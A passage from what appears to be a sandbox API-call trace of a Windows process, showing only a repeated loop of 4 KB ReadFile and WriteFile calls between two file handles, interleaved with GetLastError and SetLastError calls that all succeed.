hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.774] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.774] GetLastError () returned 0x0 [0102.774] SetLastError (dwErrCode=0x0) [0102.774] GetLastError () returned 0x0 [0102.774] SetLastError (dwErrCode=0x0) [0102.774] GetLastError () returned 0x0 [0102.774] SetLastError (dwErrCode=0x0) [0102.775] GetLastError () returned 0x0 [0102.775] SetLastError (dwErrCode=0x0) [0102.775] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.775] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.775] GetLastError () returned 0x0 [0102.775] SetLastError (dwErrCode=0x0) [0102.775] GetLastError () returned 0x0 [0102.775] SetLastError (dwErrCode=0x0) [0102.775] GetLastError () returned 0x0 [0102.775] SetLastError (dwErrCode=0x0) [0102.775] GetLastError () returned 0x0 [0102.775] SetLastError (dwErrCode=0x0) [0102.776] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.776] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.777] GetLastError () returned 0x0 [0102.777] SetLastError (dwErrCode=0x0) [0102.777] GetLastError () returned 0x0 [0102.777] SetLastError (dwErrCode=0x0) [0102.777] GetLastError () returned 0x0 [0102.777] SetLastError (dwErrCode=0x0) [0102.777] GetLastError () returned 0x0 [0102.777] SetLastError (dwErrCode=0x0) [0102.777] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.777] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.777] GetLastError () returned 0x0 [0102.777] SetLastError (dwErrCode=0x0) [0102.778] GetLastError () returned 0x0 [0102.778] SetLastError (dwErrCode=0x0) [0102.778] GetLastError () returned 0x0 [0102.778] SetLastError (dwErrCode=0x0) [0102.778] GetLastError () returned 0x0 [0102.778] SetLastError (dwErrCode=0x0) [0102.778] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.778] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.778] GetLastError () returned 0x0 [0102.778] SetLastError (dwErrCode=0x0) [0102.778] GetLastError () returned 0x0 [0102.778] SetLastError (dwErrCode=0x0) [0102.778] GetLastError () returned 0x0 [0102.778] SetLastError (dwErrCode=0x0) [0102.778] GetLastError () returned 0x0 [0102.778] SetLastError (dwErrCode=0x0) [0102.778] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.778] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.779] GetLastError () returned 0x0 [0102.779] SetLastError (dwErrCode=0x0) [0102.779] GetLastError () returned 0x0 [0102.779] SetLastError (dwErrCode=0x0) [0102.779] GetLastError () returned 0x0 [0102.779] SetLastError (dwErrCode=0x0) [0102.779] GetLastError () returned 0x0 [0102.779] SetLastError (dwErrCode=0x0) [0102.779] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.779] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.779] GetLastError () returned 0x0 [0102.779] SetLastError (dwErrCode=0x0) [0102.779] GetLastError () returned 0x0 [0102.779] SetLastError (dwErrCode=0x0) [0102.779] GetLastError () returned 0x0 [0102.779] SetLastError (dwErrCode=0x0) [0102.779] GetLastError () returned 0x0 [0102.779] SetLastError (dwErrCode=0x0) [0102.779] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.780] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.780] GetLastError () returned 0x0 [0102.780] SetLastError (dwErrCode=0x0) [0102.780] GetLastError () returned 0x0 [0102.780] SetLastError (dwErrCode=0x0) [0102.780] GetLastError () returned 0x0 [0102.780] SetLastError (dwErrCode=0x0) [0102.780] GetLastError () returned 0x0 [0102.780] SetLastError (dwErrCode=0x0) [0102.780] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.780] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.780] GetLastError () returned 0x0 [0102.780] SetLastError (dwErrCode=0x0) [0102.780] GetLastError () returned 0x0 [0102.780] SetLastError (dwErrCode=0x0) [0102.780] GetLastError () returned 0x0 [0102.781] SetLastError (dwErrCode=0x0) [0102.781] GetLastError () returned 0x0 [0102.781] SetLastError (dwErrCode=0x0) [0102.781] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.781] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.781] GetLastError () returned 0x0 [0102.781] SetLastError (dwErrCode=0x0) [0102.781] GetLastError () returned 0x0 [0102.781] SetLastError (dwErrCode=0x0) [0102.781] GetLastError () returned 0x0 [0102.781] SetLastError (dwErrCode=0x0) [0102.781] GetLastError () returned 0x0 [0102.781] SetLastError (dwErrCode=0x0) [0102.781] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.781] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.781] GetLastError () returned 0x0 [0102.781] SetLastError (dwErrCode=0x0) [0102.782] GetLastError () returned 0x0 [0102.782] SetLastError (dwErrCode=0x0) [0102.782] GetLastError () returned 0x0 [0102.782] SetLastError (dwErrCode=0x0) [0102.782] GetLastError () returned 0x0 [0102.782] SetLastError (dwErrCode=0x0) [0102.782] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.782] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.782] GetLastError () returned 0x0 [0102.782] SetLastError (dwErrCode=0x0) [0102.782] GetLastError () returned 0x0 [0102.782] SetLastError (dwErrCode=0x0) [0102.782] GetLastError () returned 0x0 [0102.782] SetLastError (dwErrCode=0x0) [0102.782] GetLastError () returned 0x0 [0102.782] SetLastError (dwErrCode=0x0) [0102.782] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.782] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.783] GetLastError () returned 0x0 [0102.783] SetLastError (dwErrCode=0x0) [0102.783] GetLastError () returned 0x0 [0102.783] SetLastError (dwErrCode=0x0) [0102.783] GetLastError () returned 0x0 [0102.783] SetLastError (dwErrCode=0x0) [0102.783] GetLastError () returned 0x0 [0102.783] SetLastError (dwErrCode=0x0) [0102.783] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.783] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.783] GetLastError () returned 0x0 [0102.783] SetLastError (dwErrCode=0x0) [0102.783] GetLastError () returned 0x0 [0102.783] SetLastError (dwErrCode=0x0) [0102.783] GetLastError () returned 0x0 [0102.783] SetLastError (dwErrCode=0x0) [0102.783] GetLastError () returned 0x0 [0102.783] SetLastError (dwErrCode=0x0) [0102.784] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.784] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.784] GetLastError () returned 0x0 [0102.784] SetLastError (dwErrCode=0x0) [0102.784] GetLastError () returned 0x0 [0102.784] SetLastError (dwErrCode=0x0) [0102.784] GetLastError () returned 0x0 [0102.784] SetLastError (dwErrCode=0x0) [0102.784] GetLastError () returned 0x0 [0102.784] SetLastError (dwErrCode=0x0) [0102.784] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.784] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.784] GetLastError () returned 0x0 [0102.784] SetLastError (dwErrCode=0x0) [0102.784] GetLastError () returned 0x0 [0102.784] SetLastError (dwErrCode=0x0) [0102.785] GetLastError () returned 0x0 [0102.785] SetLastError (dwErrCode=0x0) [0102.785] GetLastError () returned 0x0 [0102.785] SetLastError (dwErrCode=0x0) [0102.785] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.785] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.785] GetLastError () returned 0x0 [0102.785] SetLastError (dwErrCode=0x0) [0102.785] GetLastError () returned 0x0 [0102.785] SetLastError (dwErrCode=0x0) [0102.785] GetLastError () returned 0x0 [0102.785] SetLastError (dwErrCode=0x0) [0102.785] GetLastError () returned 0x0 [0102.785] SetLastError (dwErrCode=0x0) [0102.785] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.785] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.786] GetLastError () returned 0x0 [0102.786] SetLastError (dwErrCode=0x0) [0102.786] GetLastError () returned 0x0 [0102.786] SetLastError (dwErrCode=0x0) [0102.786] GetLastError () returned 0x0 [0102.786] SetLastError (dwErrCode=0x0) [0102.786] GetLastError () returned 0x0 [0102.786] SetLastError (dwErrCode=0x0) [0102.786] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.786] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.786] GetLastError () returned 0x0 [0102.786] SetLastError (dwErrCode=0x0) [0102.786] GetLastError () returned 0x0 [0102.786] SetLastError (dwErrCode=0x0) [0102.786] GetLastError () returned 0x0 [0102.786] SetLastError (dwErrCode=0x0) [0102.786] GetLastError () returned 0x0 [0102.786] SetLastError (dwErrCode=0x0) [0102.786] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.786] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.787] GetLastError () returned 0x0 [0102.787] SetLastError (dwErrCode=0x0) [0102.787] GetLastError () returned 0x0 [0102.787] SetLastError (dwErrCode=0x0) [0102.787] GetLastError () returned 0x0 [0102.787] SetLastError (dwErrCode=0x0) [0102.787] GetLastError () returned 0x0 [0102.787] SetLastError (dwErrCode=0x0) [0102.787] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.787] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.787] GetLastError () returned 0x0 [0102.787] SetLastError (dwErrCode=0x0) [0102.787] GetLastError () returned 0x0 [0102.787] SetLastError (dwErrCode=0x0) [0102.787] GetLastError () returned 0x0 [0102.787] SetLastError (dwErrCode=0x0) [0102.787] GetLastError () returned 0x0 [0102.787] SetLastError (dwErrCode=0x0) [0102.787] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.788] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.788] GetLastError () returned 0x0 [0102.788] SetLastError (dwErrCode=0x0) [0102.788] GetLastError () returned 0x0 [0102.788] SetLastError (dwErrCode=0x0) [0102.788] GetLastError () returned 0x0 [0102.788] SetLastError (dwErrCode=0x0) [0102.788] GetLastError () returned 0x0 [0102.788] SetLastError (dwErrCode=0x0) [0102.788] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.788] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.788] GetLastError () returned 0x0 [0102.788] SetLastError (dwErrCode=0x0) [0102.788] GetLastError () returned 0x0 [0102.788] SetLastError (dwErrCode=0x0) [0102.788] GetLastError () returned 0x0 [0102.789] SetLastError (dwErrCode=0x0) [0102.789] GetLastError () returned 0x0 [0102.789] SetLastError (dwErrCode=0x0) [0102.789] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.789] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.789] GetLastError () returned 0x0 [0102.789] SetLastError (dwErrCode=0x0) [0102.789] GetLastError () returned 0x0 [0102.789] SetLastError (dwErrCode=0x0) [0102.789] GetLastError () returned 0x0 [0102.789] SetLastError (dwErrCode=0x0) [0102.789] GetLastError () returned 0x0 [0102.789] SetLastError (dwErrCode=0x0) [0102.789] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.789] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.789] GetLastError () returned 0x0 [0102.790] SetLastError (dwErrCode=0x0) [0102.790] GetLastError () returned 0x0 [0102.790] SetLastError (dwErrCode=0x0) [0102.790] GetLastError () returned 0x0 [0102.790] SetLastError (dwErrCode=0x0) [0102.790] GetLastError () returned 0x0 [0102.790] SetLastError (dwErrCode=0x0) [0102.790] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.790] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.791] GetLastError () returned 0x0 [0102.791] SetLastError (dwErrCode=0x0) [0102.791] GetLastError () returned 0x0 [0102.791] SetLastError (dwErrCode=0x0) [0102.791] GetLastError () returned 0x0 [0102.791] SetLastError (dwErrCode=0x0) [0102.791] GetLastError () returned 0x0 [0102.791] SetLastError (dwErrCode=0x0) [0102.791] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.791] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.792] GetLastError () returned 0x0 [0102.792] SetLastError (dwErrCode=0x0) [0102.792] GetLastError () returned 0x0 [0102.792] SetLastError (dwErrCode=0x0) [0102.792] GetLastError () returned 0x0 [0102.792] SetLastError (dwErrCode=0x0) [0102.792] GetLastError () returned 0x0 [0102.792] SetLastError (dwErrCode=0x0) [0102.792] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.792] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.792] GetLastError () returned 0x0 [0102.792] SetLastError (dwErrCode=0x0) [0102.792] GetLastError () returned 0x0 [0102.792] SetLastError (dwErrCode=0x0) [0102.792] GetLastError () returned 0x0 [0102.792] SetLastError (dwErrCode=0x0) [0102.792] GetLastError () returned 0x0 [0102.792] SetLastError (dwErrCode=0x0) [0102.792] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.793] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.793] GetLastError () returned 0x0 [0102.793] SetLastError (dwErrCode=0x0) [0102.793] GetLastError () returned 0x0 [0102.793] SetLastError (dwErrCode=0x0) [0102.793] GetLastError () returned 0x0 [0102.793] SetLastError (dwErrCode=0x0) [0102.793] GetLastError () returned 0x0 [0102.793] SetLastError (dwErrCode=0x0) [0102.793] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.793] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.793] GetLastError () returned 0x0 [0102.793] SetLastError (dwErrCode=0x0) [0102.793] GetLastError () returned 0x0 [0102.793] SetLastError (dwErrCode=0x0) [0102.793] GetLastError () returned 0x0 [0102.794] SetLastError (dwErrCode=0x0) [0102.794] GetLastError () returned 0x0 [0102.794] SetLastError (dwErrCode=0x0) [0102.794] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.794] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.794] GetLastError () returned 0x0 [0102.794] SetLastError (dwErrCode=0x0) [0102.794] GetLastError () returned 0x0 [0102.794] SetLastError (dwErrCode=0x0) [0102.794] GetLastError () returned 0x0 [0102.794] SetLastError (dwErrCode=0x0) [0102.794] GetLastError () returned 0x0 [0102.794] SetLastError (dwErrCode=0x0) [0102.794] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.794] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.794] GetLastError () returned 0x0 [0102.794] SetLastError (dwErrCode=0x0) [0102.795] GetLastError () returned 0x0 [0102.795] SetLastError (dwErrCode=0x0) [0102.795] GetLastError () returned 0x0 [0102.795] SetLastError (dwErrCode=0x0) [0102.795] GetLastError () returned 0x0 [0102.795] SetLastError (dwErrCode=0x0) [0102.795] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, 